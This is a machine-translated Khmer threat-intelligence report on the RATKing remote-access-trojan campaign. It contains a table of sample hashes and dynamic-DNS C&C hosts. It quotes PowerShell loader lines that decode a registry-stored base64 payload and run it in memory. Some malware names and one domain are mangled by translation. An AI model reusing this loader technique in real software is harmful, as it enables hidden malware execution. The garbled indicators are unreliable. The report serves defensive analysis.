αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž“αŸƒαž€αžΆαžšαž…αžΆαž€αŸ‹αžαŸ’αž“αžΆαŸ†αžαŸ’αžšαžΌαžœαž”αžΆαž“αž’αž“αž»αžœαžαŸ’αž

αž•αŸ’αž›αžΌαžœαž„αž„αžΉαž

16-04-2020

ea64fe672c953adc19553ea3b9118ce4ee88a14d92fc7e75aa04972848472702

kimjoy007.dyndns[.]org: 2017

svchost

Parallax

24-04-2020

b4ecd8dbbceaadd482f1b23b712bcddc5464bccaac11fe78ea5fd0ba932a4043

kimjoy007.dyndns[.]org: 2019

svchost

αžαŸ†αž”αž“αŸ‹β€‹αžŸαž„αŸ’αž‚αŸ’αžšαžΆαž˜

18-05-2020

3786324ce3f8c1ea3784e5389f84234f81828658b22b8a502b7d48866f5aa3d3

kimjoy007.dyndns[.]org: 9933

svchost

αž”αžŽαŸ’αžαžΆαž‰

20-05-2020

6dac218f741b022f5cad3b5ee01dbda80693f7045b42a0c70335d8a729002f2d

kimjoy007.dyndns[.]org: 2000

svchost

αž§αž‘αžΆαž αžšαžŽαŸαž“αŸƒαž˜αŸαžšαŸ„αž‚αžŠαŸ‚αž›αž”αžΆαž“αž…αŸ‚αž€αž…αžΆαž™αž‡αžΆαž˜αž½αž™αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸαž‚αŸ’αžšαž”αŸ‹αž‚αŸ’αžšαž„αžŠαžΌαž…αž‚αŸ’αž“αžΆαŸ”

αžšαžΏαž„αž–αžΈαžšαž‚αžΊαž‚αž½αžšαž±αŸ’αž™αž€αžαŸ‹αžŸαž˜αŸ’αž‚αžΆαž›αŸ‹αž“αŸ…αž‘αžΈαž“αŸαŸ‡αŸ”

αž‘αžΈαž˜αž½αž™ αž€αžΆαžšαž–αž·αžαžŠαŸ‚αž›αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž”αžΆαž“αž”αŸ’αžšαžΎαž‚αŸ’αžšαž½αžŸαžΆαžš RAT αž•αŸ’αžŸαŸαž„αŸ—αž‚αŸ’αž“αžΆαž‡αžΆαž…αŸ’αžšαžΎαž“αž€αŸ’αž“αž»αž„αž–αŸαž›αžαŸ‚αž˜αž½αž™αŸ” αž’αžΆαž€αž”αŸ’αž”αž€αž·αžšαž·αž™αžΆαž“αŸαŸ‡αž˜αž·αž“αž˜αžΆαž“αž›αž€αŸ’αžαžŽαŸˆαž’αž˜αŸ’αž˜αžαžΆαžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž€αŸ’αžšαž»αž˜αž’αŸŠαžΈαž“αž’αžΊαžŽαŸαžαž›αŸ’αž”αžΈ αžŠαŸ‚αž›αž‡αžΆαžšαžΏαž™αŸ—αž”αŸ’αžšαžΎαž”αŸ’αžšαž αŸ‚αž›αž§αž”αž€αžšαžŽαŸαžŠαžΌαž…αž‚αŸ’αž“αžΆαžŠαŸ‚αž›αž’αŸ’αž›αžΆαž”αŸ‹αžŸαŸ’αž‚αžΆαž›αŸ‹αŸ”

αž‘αžΈαž–αžΈαžš RATKing αž”αžΆαž“αž”αŸ’αžšαžΎαž˜αŸαžšαŸ„αž‚αžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαž”αžΆαž“αž›αž€αŸ‹αž“αŸ…αž›αžΎαžœαŸαž‘αž·αž€αžΆαž―αž€αž‘αŸαžŸαž€αŸ’αž“αž»αž„αžαž˜αŸ’αž›αŸƒαž‘αžΆαž” αž¬αžŸαžΌαž˜αŸ’αž”αžΈαžαŸ‚αž‚αž˜αŸ’αžšαŸ„αž„αž”αŸ’αžšαž—αž–αž”αžΎαž€αž…αŸ†αž αŸ”

αž”αž‰αŸ’αž‡αžΈαž–αŸαž‰αž›αŸαž‰αž“αŸƒαž˜αŸαžšαŸ„αž‚αžŠαŸ‚αž›αž”αŸ’αžšαžΎαž€αŸ’αž“αž»αž„αž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαž“αŸαŸ‡ αž‡αžΆαž˜αž½αž™αž“αžΉαž„αž€αžΆαžšαž–αŸ’αžšαž˜αžΆαž“αžŠαŸαžŸαŸ†αžαžΆαž“αŸ‹αž˜αž½αž™ αžαŸ’αžšαžΌαžœαž”αžΆαž“αž•αŸ’αžαž›αŸ‹αž±αŸ’αž™αž“αŸ…αž…αž»αž„αž”αž‰αŸ’αž…αž”αŸ‹αž“αŸƒαž’αžαŸ’αžαž”αž‘αŸ”

αž’αŸ†αž–αžΈαž€αŸ’αžšαž»αž˜

αž™αžΎαž„αž˜αž·αž“αž’αžΆαž…αžŸαž“αŸ’αž˜αžαžαžΆαž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαž–αŸ’αž™αžΆαž”αžΆαž‘αžŠαŸ‚αž›αž”αžΆαž“αž–αž·αž–αžŽαŸŒαž“αžΆαž‘αŸ…αž€αžΆαž“αŸ‹αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαžŠαŸ‚αž›αž‚αŸαžŸαŸ’αž‚αžΆαž›αŸ‹αž“αŸ„αŸ‡αž‘αŸαŸ” αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž–αŸαž›αž“αŸαŸ‡ αž™αžΎαž„αž‡αžΏαžαžΆ αž€αžΆαžšαžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž‘αžΆαŸ†αž„αž“αŸαŸ‡αžαŸ’αžšαžΌαžœαž”αžΆαž“αž’αŸ’αžœαžΎαž‘αžΎαž„αžŠαŸ„αž™αž€αŸ’αžšαž»αž˜αžαŸ’αž˜αžΈαž‡αžΆαž˜αžΌαž›αžŠαŸ’αž‹αžΆαž“αŸ” αžŠαžΌαž…αžŠαŸ‚αž›αž™αžΎαž„αž”αžΆαž“αžŸαžšαžŸαŸαžšαž“αŸ…αžŠαžΎαž˜αžŠαŸ†αž”αžΌαž„ αž™αžΎαž„αž αŸ…αžœαžΆαžαžΆ RATKing αŸ”

αžŠαžΎαž˜αŸ’αž”αžΈαž”αž„αŸ’αž€αžΎαžαžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αž€αŸ’αžšαž»αž˜αž”αŸ’αžšαž αŸ‚αž›αž‡αžΆαž”αžΆαž“αž”αŸ’αžšαžΎαž§αž”αž€αžšαžŽαŸαžŸαŸ’αžšαžŠαŸ€αž„αž“αžΉαž„αž§αž”αž€αžšαžŽαŸαž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ VBS-Crypter αž–αžΈαž’αŸ’αž“αž€αž’αž—αž·αžœαžŒαŸ’αžαž“αŸ NYAN-x-CAT. αž“αŸαŸ‡αžαŸ’αžšαžΌαžœαž”αžΆαž“αž…αž„αŸ’αž’αž»αž›αž”αž„αŸ’αž αžΆαž‰αžŠαŸ„αž™αž—αžΆαž–αžŸαŸ’αžšαžŠαŸ€αž„αž‚αŸ’αž“αžΆαž“αŸƒαžŸαŸ’αž‚αŸ’αžšαžΈαž”αžŠαŸ‚αž›αž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž“αŸαŸ‡αž”αž„αŸ’αž€αžΎαžαž‡αžΆαž˜αž½αž™αž“αžΉαž„αžŸαŸ’αž‚αŸ’αžšαžΈαž”αžšαž”αžŸαŸ‹αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαŸ” αž‡αžΆαž–αž·αžŸαŸαžŸαž–αž½αž€αž‚αŸαž‘αžΆαŸ†αž„αž–αžΈαžšαŸ–

  • αž’αž“αž»αžœαžαŸ’αžαž€αžΆαžšαž–αž“αŸ’αž™αžΆαžšαž–αŸαž›αžŠαŸ„αž™αž”αŸ’αžšαžΎαž˜αž»αžαž„αžΆαžš Sleep;
  • αž”αŸ’αžšαžΎ WMI;
  • αž…αž»αŸ‡αžˆαŸ’αž˜αŸ„αŸ‡αžαž½αž“αŸƒαž―αž€αžŸαžΆαžšαžŠαŸ‚αž›αž’αžΆαž…αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž”αžΆαž“αž‡αžΆαž”αŸ‰αžΆαžšαŸ‰αžΆαž˜αŸ‰αŸ‚αžαŸ’αžšαžŸαŸ†αžαžΆαž“αŸ‹αž…αž»αŸ‡αž”αž‰αŸ’αž‡αžΈ;
  • αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž―αž€αžŸαžΆαžšαž“αŸαŸ‡αžŠαŸ„αž™αž”αŸ’αžšαžΎ PowerShell αž€αŸ’αž“αž»αž„αž…αž“αŸ’αž›αŸ„αŸ‡αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“αž•αŸ’αž‘αžΆαž›αŸ‹αžαŸ’αž›αž½αž“αžšαž”αžŸαŸ‹αžœαžΆαŸ”

αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αž—αžΆαž–αž…αŸ’αž”αžΆαžŸαŸ‹αž›αžΆαžŸαŸ‹ αžŸαžΌαž˜αž”αŸ’αžšαŸ€αž”αž’αŸ€αž”αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆ PowerShell αžŠαžΎαž˜αŸ’αž”αžΈαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž―αž€αžŸαžΆαžšαž–αžΈαž”αž‰αŸ’αž‡αžΈαžˆαŸ’αž˜αŸ„αŸ‡ αžŠαŸ‚αž›αžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αŸ’αžšαžΎαžŠαŸ„αž™αžŸαŸ’αž‚αŸ’αžšαžΈαž”αžŠαŸ‚αž›αž”αžΆαž“αž”αž„αŸ’αž€αžΎαžαžŠαŸ„αž™αž”αŸ’αžšαžΎ VBS-CrypterαŸ–

((Get-ItemPropertyHKCU:SoftwareNYANxCAT).NYANxCAT);$text=-join$text[-1..-$text.Length];[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String($text)).EntryPoint.Invoke($Null,$Null);

αž‡αžΆαž˜αž½αž™αž“αžΉαž„αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžŸαŸ’αžšαžŠαŸ€αž„αž‚αŸ’αž“αžΆ αžŠαŸ‚αž›αžŸαŸ’αž‚αŸ’αžšαžΈαž”αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž”αžΆαž“αž”αŸ’αžšαžΎαŸ–

[System.Threading.Thread]::GetDomain().Load((ItemProperty HKCU:///Software///<rnd_sub_key_name> ).<rnd_value_name>);
[GUyyvmzVhebFCw]::EhwwK('WScript.ScriptFullName', 'rWZlgEtiZr', 'WScript.ScriptName'),0

αž…αŸ†αžŽαžΆαŸ†αžαžΆαž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαž”αžΆαž“αž”αŸ’αžšαžΎαž§αž”αž€αžšαžŽαŸαž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž•αŸ’αžŸαŸαž„αž‘αŸ€αžαž–αžΈ NYAN-x-CAT αž‡αžΆαž”αž“αŸ’αž‘αž»αž€αž˜αž½αž™ - LimeRAT.

αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“αžšαž”αžŸαŸ‹αž˜αŸ‰αžΆαžŸαŸŠαžΈαž“αž˜αŸ C&C αž”αž„αŸ’αž αžΆαž‰αž–αžΈαž›αž€αŸ’αžαžŽαŸˆαž–αž·αžŸαŸαžŸαž”αŸ’αž›αŸ‚αž€αž˜αž½αž™αž‘αŸ€αžαž“αŸƒ RATKingαŸ– αž€αŸ’αžšαž»αž˜αž…αžΌαž›αž…αž·αžαŸ’αžαžŸαŸαžœαžΆαž€αž˜αŸ’αž˜ DNS αžαžΆαž˜αžœαž“αŸ’αž (αžŸαžΌαž˜αž˜αžΎαž›αž”αž‰αŸ’αž‡αžΈ C&Cs αž“αŸ…αž€αŸ’αž“αž»αž„αžαžΆαžšαžΆαž„ IoC)αŸ”

αž’αžΆαž™αž’αžΌαžŸαŸŠαžΈ

αžαžΆαžšαžΆαž„αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž•αŸ’αžαž›αŸ‹αž“αžΌαžœαž”αž‰αŸ’αž‡αžΈαž–αŸαž‰αž›αŸαž‰αž“αŸƒαžŸαŸ’αž‚αŸ’αžšαžΈαž” VBS αžŠαŸ‚αž›αž‘αŸ†αž“αž„αž‡αžΆαž’αžΆαž…αžαŸ’αžšαžΌαžœαž”αžΆαž“αžŸαž“αŸ’αž˜αžαžαžΆαž‡αžΆαž™αž»αž‘αŸ’αž’αž“αžΆαž€αžΆαžšαžŠαŸ‚αž›αž”αžΆαž“αž–αž·αž–αžŽαŸŒαž“αžΆαŸ” αžŸαŸ’αž‚αŸ’αžšαžΈαž”αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž“αŸαŸ‡αž‚αžΊαžŸαŸ’αžšαžŠαŸ€αž„αž‚αŸ’αž“αžΆ αž“αž·αž„αž’αž“αž»αžœαžαŸ’αžαž”αŸ’αžšαž˜αžΆαžŽαž‡αžΆαž›αŸ†αžŠαžΆαž”αŸ‹αžŠαžΌαž…αž‚αŸ’αž“αžΆαž“αŸƒαžŸαž€αž˜αŸ’αž˜αž—αžΆαž–αŸ” αž–αž½αž€αžœαžΆαž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž”αž‰αŸ’αž…αžΌαž›αž˜αŸαžšαŸ„αž‚αž”αŸ’αžšαž—αŸαž‘ RAT αž‘αŸ…αž€αŸ’αž“αž»αž„αžŠαŸ†αžŽαžΎαžšαž€αžΆαžš Windows αžŠαŸ‚αž›αž’αžΆαž…αž‘αž»αž€αž…αž·αžαŸ’αžαž”αžΆαž“αŸ” αž–αž½αž€αž‚αŸαž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž˜αžΆαž“αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“ C&C αžŠαŸ‚αž›αž”αžΆαž“αž…αž»αŸ‡αžˆαŸ’αž˜αŸ„αŸ‡αžŠαŸ„αž™αž”αŸ’αžšαžΎαžŸαŸαžœαžΆαž€αž˜αŸ’αž˜ DNS αžαžΆαž˜αžœαž“αŸ’αžαŸ”

αž‘αŸ„αŸ‡αž‡αžΆαž™αŸ‰αžΆαž„αžŽαžΆαž€αŸαžŠαŸ„αž™ αž™αžΎαž„αž˜αž·αž“αž’αžΆαž…αž’αŸ‡αž’αžΆαž„αžαžΆ αžŸαŸ’αž‚αŸ’αžšαžΈαž”αž‘αžΆαŸ†αž„αž’αžŸαŸ‹αž“αŸαŸ‡αžαŸ’αžšαžΌαžœαž”αžΆαž“αž…αŸ‚αž€αž…αžΆαž™αžŠαŸ„αž™αž’αŸ’αž“αž€αžœαžΆαž™αž”αŸ’αžšαž αžΆαžšαžŠαžΌαž…αž‚αŸ’αž“αžΆ αž›αžΎαž€αž›αŸ‚αž„αžαŸ‚αž‚αŸ†αžšαžΌαžŠαŸ‚αž›αž˜αžΆαž“αž’αžΆαžŸαž™αžŠαŸ’αž‹αžΆαž“ C&C αžŠαžΌαž…αž‚αŸ’αž“αžΆ (αž§αž‘αžΆαž αžšαžŽαŸ kimjoy007.dyndns.org)αŸ”

αžˆαŸ’αž˜αŸ„αŸ‡αž˜αŸαžšαŸ„αž‚

SHA-256

ស៊ី & ស៊ី

αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž“αŸƒαž€αžΆαžšαž…αžΆαž€αŸ‹αžαŸ’αž“αžΆαŸ†αžαŸ’αžšαžΌαžœαž”αžΆαž“αž’αž“αž»αžœαžαŸ’αž

Parallax

b4ecd8dbbceaadd482f1b23b712bcddc5464bccaac11fe78ea5fd0ba932a4043

kimjoy007.dyndns.org

svchost

00edb8200dfeee3bdd0086c5e8e07c6056d322df913679a9f22a2b00b836fd72

Hope.doomdns.org

svchost

504cbae901c4b3987aa9ba458a230944cb8bd96bbf778ceb54c773b781346146

kimjoy007.dyndns.org

svchost

1487017e087b75ad930baa8b017e8388d1e99c75d26b5d1deec8b80e9333f189

kimjoy007.dyndns.org

svchost

c4160ec3c8ad01539f1c16fb35ed9c8c5a53a8fda8877f0d5e044241ea805891

Franco20.dvrdns.org

svchost

515249d6813bb2dde1723d35ee8eb6eeb8775014ca629ede017c3d83a77634ce

kimjoy007.dyndns.org

svchost

1b70f6fee760bcfe0c457f0a85ca451ed66e61f0e340d830f382c5d2f7ab803f

Franco20.dvrdns.org

svchost

b2bdffa5853f29c881d7d9bff91b640bc1c90e996f85406be3b36b2500f61aa1

Hope.doomdns.org

svchost

c9745a8f33b3841fe7bfafd21ad4678d46fe6ea6125a8fedfcd2d5aee13f1601

kimjoy007.dyndns.org

svchost

1dfc66968527fbd4c0df2ea34c577a7ce7a2ba9b54ba00be62120cc88035fa65

Franco20.dvrdns.org

svchost

c6c05f21e16e488eed3001d0d9dd9c49366779559ad77fcd233de15b1773c981

kimjoy007.dyndns.org

cmd

3b785cdcd69a96902ee62499c25138a70e81f14b6b989a2f81d82239a19a3aed

Hope.doomdns.org

svchost

4d71ceb9d6c53ac356c0f5bdfd1a5b28981061be87e38e077ee3a419e4c476f9

្០០ៀpara.ddns.net

svchost

00185cc085f284ece264e3263c7771073a65783c250c5fd9afc7a85ed94acc77

Hope.doomdns.org

svchost

0342107c0d2a069100e87ef5415e90fd86b1b1b1c975d0eb04ab1489e198fc78

Franco20.dvrdns.org

svchost

de33b7a7b059599dc62337f92ceba644ac7b09f60d06324ecf6177fff06b8d10

kimjoy007.dyndns.org

svchost

80a8114d63606e225e620c64ad8e28c9996caaa9a9e87dd602c8f920c2197007

kimjoy007.dyndns.org

svchost

acb157ba5a48631e1f9f269e6282f042666098614b66129224d213e27c1149bb

Hope.doomdns.org

cmd

bf608318018dc10016b438f851aab719ea0abe6afc166c8aea6b04f2320896d3

Franco20.dvrdns.org

svchost

4d0c9b8ad097d35b447d715a815c67ff3d78638b305776cde4d90bfdcb368e38

Hope.doomdns.org

svchost

e7c676f5be41d49296454cd6e4280d89e37f506d84d57b22f0be0d87625568ba

kimjoy007.dyndns.org

svchost

9375d54fcda9c7d65f861dfda698e25710fda75b5ebfc7a238599f4b0d34205f

Franco20.dvrdns.org

svchost

128367797fdf3c952831c2472f7a308f345ca04aa67b3f82b945cfea2ae11ce5

kimjoy007.dyndns.org

svchost

09bd720880461cb6e996046c7d6a1c937aa1c99bd19582a562053782600da79d

Hope.doomdns.org

svchost

0a176164d2e1d5e2288881cc2e2d88800801001d03caedd524db365513e11276

paradickhead.homeip.net

svchost

0af5194950187fd7cbd75b1b39aab6e1e78dae7c216d08512755849c6a0d1cbe

Hope.doomdns.org

svchost

αžαŸ†αž”αž“αŸ‹β€‹αžŸαž„αŸ’αž‚αŸ’αžšαžΆαž˜

3786324ce3f8c1ea3784e5389f84234f81828658b22b8a502b7d48866f5aa3d3

kimjoy007.dyndns.org

svchost

db0d5a67a0ced6b2de3ee7d7fc845a34b9d6ca608e5fead7f16c9a640fa659eb

kimjoy007.dyndns.org

svchost

αž”αžŽαŸ’αžαžΆαž‰

6dac218f741b022f5cad3b5ee01dbda80693f7045b42a0c70335d8a729002f2d

kimjoy007.dyndns.org

svchost

αž•αŸ’αž›αžΌαžœαž„αž„αžΉαž

ea64fe672c953adc19553ea3b9118ce4ee88a14d92fc7e75aa04972848472702

kimjoy007.dyndns.org

svchost

WSH RAT

d410ced15c848825dcf75d30808cde7784e5b208f9a57b0896e828f890faea0e

anekesolution.linkpc.net

RegAsm

lime

896604d27d88c75a475b28e88e54104e66f480bcab89cc75b6cdc6b29f8e438b

softmy.duckdns.org

RegAsm

QuasarRAT

bd1e29e9d17edbab41c3634649da5c5d20375f055ccf968c022811cd9624be57

darkhate-23030.portmap.io

RegAsm

12044aa527742282ad5154a4de24e55c9e1fae42ef844ed6f2f890296122153b

darkhate-23030.portmap.io

RegAsm

be93cc77d864dafd7d8c21317722879b65cfbb3297416bde6ca6edbfd8166572

darkhate-23030.portmap.io

RegAsm

933a136f8969707a84a61f711018cd21ee891d5793216e063ac961b5d165f6c0

darkhate-23030.portmap.io

RegAsm

71dea554d93728cce8074dbdb4f63ceb072d4bb644f0718420f780398dafd943

chrom1.myq-see.com

RegAsm

0d344e8d72d752c06dc6a7f3abf2ff7678925fde872756bf78713027e1e332d5

darkhate-23030.portmap.io

RegAsm

0ed7f282fd242c3f2de949650c9253373265e9152c034c7df3f5f91769c6a4eb

darkhate-23030.portmap.io

RegAsm

aabb6759ce408ebfa2cc57702b14adaec933d8e4821abceaef0c1af3263b1bfa

darkhate-23030.portmap.io

RegAsm

1699a37ddcf4769111daf33b7d313cf376f47e92f6b92b2119bd0c860539f745

darkhate-23030.portmap.io

RegAsm

3472597945f3bbf84e735a778fd75c57855bb86aca9b0a4d0e4049817b508c8c

darkhate-23030.portmap.io

RegAsm

809010d8823da84cdbb2c8e6b70be725a6023c381041ebda8b125d1a6a71e9b1

darkhate-23030.portmap.io

RegAsm

4217a2da69f663f1ab42ebac61978014ec4f562501efb2e040db7ebb223a7dff

darkhate-23030.portmap.io

RegAsm

08f34b3088af792a95c49bcb9aa016d4660609409663bf1b51f4c331b87bae00

darkhate-23030.portmap.io

RegAsm

79b4efcce84e9e7a2e85df7b0327406bee0b359ad1445b4f08e390309ea0c90d

darkhate-23030.portmap.io

RegAsm

12ea7ce04e0177a71a551e6d61e4a7916b1709729b2d3e9daf7b1bdd0785f63a

darkhate-23030.portmap.io

RegAsm

d7b8eb42ae35e9cc46744f1285557423f24666db1bde92bf7679f0ce7b389af9

darkhate-23030.portmap.io

RegAsm

def09b0fed3360c457257266cb851fffd8c844bc04a623c210a2efafdf000d5c

darkhate-23030.portmap.io

RegAsm

50119497c5f919a7e816a37178d28906fb3171b07fc869961ef92601ceca4c1c

darkhate-23030.portmap.io

RegAsm

ade5a2f25f603bf4502efa800d3cf5d19d1f0d69499b0f2e9ec7c85c6dd49621

darkhate-23030.portmap.io

RegAsm

189d5813c931889190881ee34749d390e3baa80b2c67b426b10b3666c3cc64b7

darkhate-23030.portmap.io

RegAsm

c3193dd67650723753289a4aebf97d4c72a1afe73c7135bee91c77bdf1517f21

darkhate-23030.portmap.io

RegAsm

a6f814f14698141753fc6fb7850ead9af2ebcb0e32ab99236a733ddb03b9eec2

darkhate-23030.portmap.io

RegAsm

a55116253624641544175a30c956dbd0638b714ff97b9de0e24145720dcfdf74

darkhate-23030.portmap.io

RegAsm

d6e0f0fb460d9108397850169112bd90a372f66d87b028e522184682a825d213

darkhate-23030.portmap.io

RegAsm

522ba6a242c35e2bf8303e99f03a85d867496bbb0572226e226af48cc1461a86

darkhate-23030.portmap.io

RegAsm

fabfdc209b02fe522f81356680db89f8861583da89984c20273904e0cf9f4a02

darkhate-23030.portmap.io

RegAsm

08ec13b7da6e0d645e4508b19ba616e4cf4e0421aa8e26ac7f69e13dc8796691

darkhate-23030.portmap.io

RegAsm

8433c75730578f963556ec99fbc8d97fa63a522cef71933f260f385c76a8ee8d

darkhate-23030.portmap.io

RegAsm

99f6bfd9edb9bf108b11c149dd59346484c7418fc4c455401c15c8ac74b70c74

darkhate-23030.portmap.io

RegAsm

d13520e48f0ff745e31a1dfd6f15ab56c9faecb51f3d5d3d87f6f2e1abe6b5cf

darkhate-23030.portmap.io

RegAsm

9e6978b16bd52fcd9c331839545c943adc87e0fbd7b3f947bab22ffdd309f747

darkhate-23030.portmap.io

RegAsm

αž”αŸ’αžšαž—αž–: www.habr.com

αž”αž“αŸ’αžαŸ‚αž˜αž˜αžαž·αž™αŸ„αž”αž›αŸ‹